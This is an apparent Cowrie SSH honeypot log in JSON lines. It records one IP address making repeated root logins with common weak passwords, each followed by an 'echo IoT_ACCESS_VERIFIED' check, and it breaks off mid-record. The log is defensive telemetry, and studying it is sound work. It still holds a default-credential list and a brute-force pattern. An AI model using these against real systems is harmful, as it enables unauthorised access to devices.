{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.510835Z","src_ip":"212.227.125.160","session":"40ed8c1697ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54624,"dst_ip":"1.2.3.4","dst_port":22,"session":"88745836a68b","protocol":"ssh","message":"New connection: 212.227.125.160:54624 (1.2.3.4:22) [session: 88745836a68b]","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.551123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.560362Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.603776Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.799281Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:18.951230Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:18.951937Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.100111Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.101161Z","src_ip":"212.227.125.160","session":"88745836a68b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57566,"dst_ip":"1.2.3.4","dst_port":22,"session":"89f772b0c20d","protocol":"ssh","message":"New connection: 212.227.125.160:57566 (1.2.3.4:22) [session: 89f772b0c20d]","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.162565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.211989Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.212602Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.426194Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:19.624383Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.625206Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.670083Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.671113Z","src_ip":"212.227.125.160","session":"89f772b0c20d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32910,"dst_ip":"1.2.3.4","dst_port":22,"session":"549a3ec80f96","protocol":"ssh","message":"New connection: 212.227.125.160:32910 (1.2.3.4:22) [session: 549a3ec80f96]","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.710822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.724911Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.767968Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:19.931436Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:20.052565Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.053410Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.097609Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.098697Z","src_ip":"212.227.125.160","session":"549a3ec80f96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35470,"dst_ip":"1.2.3.4","dst_port":22,"session":"07bdff033897","protocol":"ssh","message":"New connection: 212.227.125.160:35470 (1.2.3.4:22) [session: 07bdff033897]","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.139413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.145721Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.182736Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.450045Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:20.715065Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.715734Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.759421Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.760564Z","src_ip":"212.227.125.160","session":"07bdff033897"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39368,"dst_ip":"1.2.3.4","dst_port":22,"session":"473665a9f07a","protocol":"ssh","message":"New connection: 212.227.125.160:39368 (1.2.3.4:22) [session: 473665a9f07a]","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.801121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.802503Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:20.851906Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.022998Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:21.163020Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.163781Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.214508Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.215619Z","src_ip":"212.227.125.160","session":"473665a9f07a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42418,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddb2e51679f6","protocol":"ssh","message":"New connection: 212.227.125.160:42418 (1.2.3.4:22) [session: ddb2e51679f6]","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.261131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.262392Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.307217Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.438411Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:21.548839Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.549577Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.596584Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.597690Z","src_ip":"212.227.125.160","session":"ddb2e51679f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45128,"dst_ip":"1.2.3.4","dst_port":22,"session":"21d07a5f4320","protocol":"ssh","message":"New connection: 212.227.125.160:45128 (1.2.3.4:22) [session: 21d07a5f4320]","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.636922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.658211Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:21.779393Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.113469Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:22.343234Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.343998Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.415287Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.416289Z","src_ip":"212.227.125.160","session":"21d07a5f4320"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50424,"dst_ip":"1.2.3.4","dst_port":22,"session":"66bfe72a7f2e","protocol":"ssh","message":"New connection: 212.227.125.160:50424 (1.2.3.4:22) [session: 66bfe72a7f2e]","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.488269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.525751Z","src_ip":"212.227.125.160","session":"66bfe72a7f2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-